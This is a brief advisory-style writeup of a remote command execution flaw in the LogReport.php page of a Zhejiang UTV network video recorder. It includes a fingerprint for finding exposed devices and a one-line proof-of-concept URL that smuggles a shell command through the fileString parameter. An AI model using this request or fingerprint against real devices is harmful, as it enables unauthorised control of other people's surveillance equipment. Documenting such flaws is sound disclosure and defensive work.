Zhejiang Utv Technology Network Video Recorder Isc Logreport Php Remote Command Execution Vulnerability
Zhejiang Utv Technology Network Video Recorder Isc Logreport Php Remote Command Execution Vulnerability
Zhejiang UTV Technology Network Video Recorder ISC LogReport.php Remote Command Execution Vulnerability
Vulnerability Description
Zhejiang UTV Technology Network Video Recorder ISC /Interface/LogReport/LogReport.php page, fileString parameter filtering is not strictly filtered, resulting in the attacker being able to execute arbitrary commands
Vulnerability Impact
Zhejiang UTV Technology Network Video Recorder ISC
Network surveying and mapping
app=”uniview-ISC”
Vulnerability reappears
Login page
Verify POC
1
/Interface/LogReport/LogReport.php?action=execUpdate&fileString=x;id>1.txt
This post is licensed under CC BY 4.0 by the author.